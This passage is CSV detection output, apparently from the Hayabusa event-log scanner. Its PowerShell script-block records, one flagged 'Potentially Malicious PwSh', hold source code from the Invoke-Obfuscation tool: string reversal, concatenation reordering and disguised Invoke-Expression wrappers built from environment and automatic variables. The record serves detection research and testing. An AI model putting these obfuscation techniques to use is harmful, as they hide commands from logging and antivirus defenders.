-ForegroundColor Green} 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Switch] $PassThru ) If(!$PSBoundParameters['PassThru']) { # Convert $ScriptString to delimited and concatenated string and encapsulate with invocation. $ScriptString = Out-StringDelimitedAndConcatenated $ScriptString } Else { # Convert $ScriptString to delimited and concatenated string and do no encapsulate with invocation. $ScriptString = Out-StringDelimitedAndConcatenated $ScriptString -PassThru } # Parse out concatenated strings to re-order them. $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) $GroupStartCount = 0 $ConcatenatedStringsIndexStart = $NULL $ConcatenatedStringsIndexEnd = $NULL $ConcatenatedStringsArray = @() For($i=0; $i -le $Tokens.Count-1; $i++) { $Token = $Tokens[$i] If(($Token.Type -eq 'GroupStart') -AND ($Token.Content -eq '(')) { $GroupStartCount = 1 $ConcatenatedStringsIndexStart = $Token.Start+1 } ElseIf(($Token.Type -eq 'GroupEnd') -AND ($Token.Content -eq ')') -OR ($Token.Type -eq 'Operator') -AND ($Token.Content -ne '+')) { $GroupStartCount-- $ConcatenatedStringsIndexEnd = $Token.Start # Stop parsing concatenated string. If(($GroupStartCount -eq 0) -AND ($ConcatenatedStringsArray.Count -gt 0)) { Break } } ElseIf(($GroupStartCount -gt 0) -AND ($Token.Type -eq 'String')) { $ConcatenatedStringsArray += $Token.Content } ElseIf($Token.Type -ne 'Operator') { # If something other than a string or operator appears then we're not dealing with a pure string concatenation. Thus we reset the group start and the concatenated strings array. 
# This only became an issue once the invocation syntax went from IEX/Invoke-Expression to concatenations like .($ShellId[1]+$ShellId[13]+'x') $GroupStartCount = 0 $ConcatenatedStringsArray = @() } } $ConcatenatedStrings = $ScriptString.SubString($ConcatenatedStringsIndexStart,$ConcatenatedStringsIndexEnd-$ConcatenatedStringsIndexStart) # Return $ScriptString as-is if there is only one substring as it would gain nothing to ""reorder"" a single substring. If($ConcatenatedStringsArray.Count -le 1) { Return $ScriptString } # Randomize the order of the concatenated strings. $RandomIndexes = (Get-Random -Input (0..$($ConcatenatedStringsArray.Count-1)) -Count $ConcatenatedStringsArray.Count) $Arguments1 = '' $Arguments2 = @('')*$ConcatenatedStringsArray.Count For($i=0; $i -lt $ConcatenatedStringsArray.Count; $i++) { $RandomIndex = $RandomIndexes[$i] $Arguments1 += '{' + $RandomIndex + '}' $Arguments2[$RandomIndex] = ""'"" + $ConcatenatedStringsArray[$i] + ""'"" } # Whitespace is not required before or after the -f operator. $ScriptStringReordered = '(' + '""' + $Arguments1 + '""' + ' '*(Get-Random @(0..1)) + '-f' + ' '*(Get-Random @(0..1)) + ($Arguments2 -Join ',') + ')' # Add re-ordered $ScriptString back into the original $ScriptString context. $ScriptString = $ScriptString.SubString(0,$ConcatenatedStringsIndexStart) + $ScriptStringReordered + $ScriptString.SubString($ConcatenatedStringsIndexEnd) Return $ScriptString } Function Out-StringReversed { <# .SYNOPSIS Generates concatenated and reversed version of input PowerShell command. Invoke-Obfuscation Function: Out-StringReversed Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ConcatenatedString, Out-RandomCase (both are located in Out-ObfuscatedToken.ps1) Optional Dependencies: None .DESCRIPTION Out-StringReversed concatenates and reverses an input PowerShell command. 
The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptString Specifies the string containing your payload. .EXAMPLE C:\PS> Out-StringReversed ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" sv 6nY (""XEI | )93]rahC[ f-)'n'+'eer'+'G'+' roloC'+'dnuo'+'rgeroF-'+' '+'}0{!sk'+'co'+'R '+'noitacsufb'+'O'+'}0'+'{ ts'+'oH-'+'etirW ;neer'+'G'+' rolo'+'C'+'dnu'+'orgeroF- }0{!d'+'l'+'roW'+' olleH}0{ tsoH-et'+'ir'+'W'(( "");IEX ( ( gcI vARiaBlE:6ny ).valUE[ -1..-( ( gcI vARiaBlE:6ny ).valUE.Length ) ]-Join '' ) .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString ) # Remove any special characters to simplify dealing with the reversed $ScriptString on the command line. $ScriptString = Out-ObfuscatedStringCommand ([ScriptBlock]::Create($ScriptString)) 1 # Reverse $ScriptString. $ScriptStringReversed = $ScriptString[-1..-($ScriptString.Length)] -Join '' # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. 
$RandomVarLength = (Get-Random -Input @(3..6)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Randomly decide if the variable name will be concatenated inline or not. # Handle both and syntaxes depending on which option is chosen concerning GET variable syntax. $RandomVarNameMaybeConcatenated = $RandomVarName $RandomVarNameMaybeConcatenatedWithVariablePrepended = 'variable:' + $RandomVarName If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName (Get-Random -Input @('""',""'""))) + ')' $RandomVarNameMaybeConcatenatedWithVariablePrepended = '(' + (Out-ConcatenatedString ""variable:$RandomVarName"" (Get-Random -Input @('""',""'""))) + ')' } # Placeholder for values to be SET in variable differently in each Switch statement below. $RandomVarValPlaceholder = '<[)(]>' # Generate random variable SET syntax. $RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $RandomVarValPlaceholder $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $RandomVarValPlaceholder + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Randomize the case of selected variable syntaxes. 
$RandomVarSet = Out-RandomCase $RandomVarSet # Generate random variable GET syntax. $RandomVarGetSyntax = @() $RandomVarGetSyntax += '$' + $RandomVarName $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('Get-Variable','Variable')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + (Get-Random -Input ((' '*(Get-Random @(0..2)) + ').Value'),(' '*(Get-Random @(1..2)) + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ' '*(Get-Random @(0..2)) + ')'))) $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenatedWithVariablePrepended + ' '*(Get-Random @(0..2)) + ').Value' # Randomly choose from above variable syntaxes. $RandomVarGet = (Get-Random -Input $RandomVarGetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarGet = Out-RandomCase $RandomVarGet # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. 
# If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += '$OFS' + ' '*(Get-Random -Input @(0,1)) + '=' + ' '*(Get-Random -Input @(0,1)) + ""''"" $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize the case of selected variable syntaxes. 
$SetOfsVar = Out-RandomCase $SetOfsVar $SetOfsVarBack = Out-RandomCase $SetOfsVarBack $StringStr = Out-RandomCase 'string' $JoinStr = Out-RandomCase 'join' $LengthStr = Out-RandomCase 'length' $ArrayStr = Out-RandomCase 'array' $ReverseStr = Out-RandomCase 'reverse' $CharStr = Out-RandomCase 'char' $RightToLeftStr = Out-RandomCase 'righttoleft' $RegexStr = Out-RandomCase 'regex' $MatchesStr = Out-RandomCase 'matches' $ValueStr = Out-RandomCase 'value' $ForEachObject = Out-Rand",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.250 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"omCase (Get-Random -Input @('ForEach-Object','ForEach','%')) # Select random method for building command to reverse the now-reversed $ScriptString to execute the original command. Switch(Get-Random -Input (1..3)) { 1 { # 1) $StringVar = $String; $StringVar[-1..-($StringVar.Length)] -Join '' # Replace placeholder with appropriate value for this Switch statement. $RandomVarSet = $RandomVarSet.Replace($RandomVarValPlaceholder,('""' + ' '*(Get-Random -Input @(0,1)) + $ScriptStringReversed + ' '*(Get-Random -Input @(0,1)) + '""')) # Set $ScriptStringReversed as environment variable $Random. $ScriptString = $RandomVarSet + ' '*(Get-Random -Input @(0,1)) + ';' + ' '*(Get-Random -Input @(0,1)) $RandomVarGet = $RandomVarGet + '[' + ' '*(Get-Random -Input @(0,1)) + '-' + ' '*(Get-Random -Input @(0,1)) + '1' + ' '*(Get-Random -Input @(0,1)) + '..' + ' '*(Get-Random -Input @(0,1)) + '-' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + "".$LengthStr"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ']' # Build out random syntax depending on whether -Join is prepended or -Join '' is appended. 
# Now also includes [String]::Join .Net syntax and [String] syntax after modifying $OFS variable to ''. $JoinOptions = @() $JoinOptions += ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet $JoinOptions += $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""''"" $JoinOptions += ""[$StringStr]::$JoinStr"" + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $RandomVarGet) + ' '*(Get-Random -Input @(0,1)) + ')' $JoinOptions += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' $JoinOption = (Get-Random -Input $JoinOptions) # Encapsulate in necessary IEX/Invoke-Expression(s). $JoinOption = Out-EncapsulatedInvokeExpression $JoinOption $ScriptString = $ScriptString + $JoinOption } 2 { # 2) $StringVar = [Char[]]$String; [Array]::Reverse($StringVar); $StringVar -Join '' # Replace placeholder with appropriate value for this Switch statement. $RandomVarSet = $RandomVarSet.Replace($RandomVarValPlaceholder,(""[$CharStr["" + ' '*(Get-Random -Input @(0,1)) + ']' + ' '*(Get-Random -Input @(0,1)) + ']' + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""')) # Set $ScriptStringReversed as environment variable $Random. 
$ScriptString = $RandomVarSet + ' '*(Get-Random -Input @(0,1)) + ';' + ' '*(Get-Random -Input @(0,1)) $ScriptString = $ScriptString + ' '*(Get-Random -Input @(0,1)) + ""[$ArrayStr]::$ReverseStr("" + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ';' # Build out random syntax depending on whether -Join is prepended or -Join '' is appended. # Now also includes [String]::Join .Net syntax and [String] syntax after modifying $OFS variable to ''. $JoinOptions = @() $JoinOptions += ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet $JoinOptions += $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""''"" $JoinOptions += ""[$StringStr]::$JoinStr"" + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' $JoinOptions += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' $JoinOption = (Get-Random -Input $JoinOptions) # Encapsulate in necessary IEX/Invoke-Expression(s). $JoinOption = Out-EncapsulatedInvokeExpression $JoinOption $ScriptString = $ScriptString + $JoinOption } 3 { # 3) -Join[Regex]::Matches($String,'.','RightToLeft') # Randomly choose to use 'RightToLeft' or concatenated version of this string in $JoinOptions below. 
If(Get-Random -Input (0..1)) { $RightToLeft = Out-ConcatenatedString $RightToLeftStr ""'"" } Else { $RightToLeft = ""'$RightToLeftStr'"" } # Build out random syntax depending on whether -Join is prepended or -Join '' is appended. # Now also includes [String]::Join .Net syntax and [String] syntax after modifying $OFS variable to ''. $JoinOptions = @() $JoinOptions += ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $JoinOptions += ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $JoinOptions += ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]::$JoinStr("" + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) 
+ "")"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '$_' + "".$ValueStr"" + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $JoinOptions += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]"" + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + "")"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '$_' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' $ScriptString = (Get-Random -Input $JoinOptions) # Encapsulate in necessary IEX/Invoke-Expression(s). $ScriptString = Out-EncapsulatedInvokeExpression $ScriptString } default {Write-Error ""An invalid value was passed to switch block.""; Exit;} } # Perform final check to remove ticks if they now precede lowercase special characters after the string is reversed. # E.g. ""testin`G"" in reverse would be ""G`nitset"" where `n would be interpreted as a newline character. 
$SpecialCharacters = @('a','b','f','n','r','t','v','0') ForEach($SpecialChar in $SpecialCharacters) { If($ScriptString.Contains(""``""+$SpecialChar)) { $ScriptString = $ScriptString.Replace(""``""+$SpecialChar,$SpecialChar) } } Return $ScriptString } Function Out-EncapsulatedInvokeExpression { <# .SYNOPSIS HELPER FUNCTION :: Generates random syntax for invoking input PowerShell command. Invoke-Obfuscation Function: Out-EncapsulatedInvokeExpression Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncapsulatedInvokeExpression generates random syntax for invoking input PowerShell command. It uses a combination of IEX and Invoke-Expression as well as ordering (IEX $Command , $Command | IEX). .PARAMETER ScriptString Specifies the string containing your payload. .EXAMPLE C:\PS> Out-EncapsulatedInvokeExpression {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green|Invoke-Expression .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 1 C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 2 C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString ) # The below code block is copy/pasted into almost every encoding function so they can maintain zero dependencies and work on their own (I admit using this bad coding practice). # Changes to below InvokeExpressionSyntax block should also be copied to those functions. # Generate random invoke operation syntax. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. 
$InvokeExpression = Out-RandomCase $InvokeExpression # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ScriptString + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $ScriptString + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $ScriptString = (Get-Random -Input $InvokeOptions) Return $ScriptString }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.250 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"omCase (Get-Random -Input @('ForEach-Object','ForEach','%')) # Select random method for building command to reverse the now-reversed $ScriptString to execute the original command. Switch(Get-Random -Input (1..3)) { 1 { # 1) $StringVar = $String; $StringVar[-1..-($StringVar.Length)] -Join '' # Replace placeholder with appropriate value for this Switch statement. $RandomVarSet = $RandomVarSet.Replace($RandomVarValPlaceholder,('""' + ' '*(Get-Random -Input @(0,1)) + $ScriptStringReversed + ' '*(Get-Random -Input @(0,1)) + '""')) # Set $ScriptStringReversed as environment variable $Random. $ScriptString = $RandomVarSet + ' '*(Get-Random -Input @(0,1)) + ';' + ' '*(Get-Random -Input @(0,1)) $RandomVarGet = $RandomVarGet + '[' + ' '*(Get-Random -Input @(0,1)) + '-' + ' '*(Get-Random -Input @(0,1)) + '1' + ' '*(Get-Random -Input @(0,1)) + '..' 
+ ' '*(Get-Random -Input @(0,1)) + '-' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + "".$LengthStr"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ']' # Build out random syntax depending on whether -Join is prepended or -Join '' is appended. # Now also includes [String]::Join .Net syntax and [String] syntax after modifying $OFS variable to ''. $JoinOptions = @() $JoinOptions += ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet $JoinOptions += $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""''"" $JoinOptions += ""[$StringStr]::$JoinStr"" + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $RandomVarGet) + ' '*(Get-Random -Input @(0,1)) + ')' $JoinOptions += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' $JoinOption = (Get-Random -Input $JoinOptions) # Encapsulate in necessary IEX/Invoke-Expression(s). $JoinOption = Out-EncapsulatedInvokeExpression $JoinOption $ScriptString = $ScriptString + $JoinOption } 2 { # 2) $StringVar = [Char[]]$String; [Array]::Reverse($StringVar); $StringVar -Join '' # Replace placeholder with appropriate value for this Switch statement. 
$RandomVarSet = $RandomVarSet.Replace($RandomVarValPlaceholder,(""[$CharStr["" + ' '*(Get-Random -Input @(0,1)) + ']' + ' '*(Get-Random -Input @(0,1)) + ']' + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""')) # Set $ScriptStringReversed as environment variable $Random. $ScriptString = $RandomVarSet + ' '*(Get-Random -Input @(0,1)) + ';' + ' '*(Get-Random -Input @(0,1)) $ScriptString = $ScriptString + ' '*(Get-Random -Input @(0,1)) + ""[$ArrayStr]::$ReverseStr("" + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ';' # Build out random syntax depending on whether -Join is prepended or -Join '' is appended. # Now also includes [String]::Join .Net syntax and [String] syntax after modifying $OFS variable to ''. $JoinOptions = @() $JoinOptions += ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet $JoinOptions += $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""''"" $JoinOptions += ""[$StringStr]::$JoinStr"" + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' $JoinOptions += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' 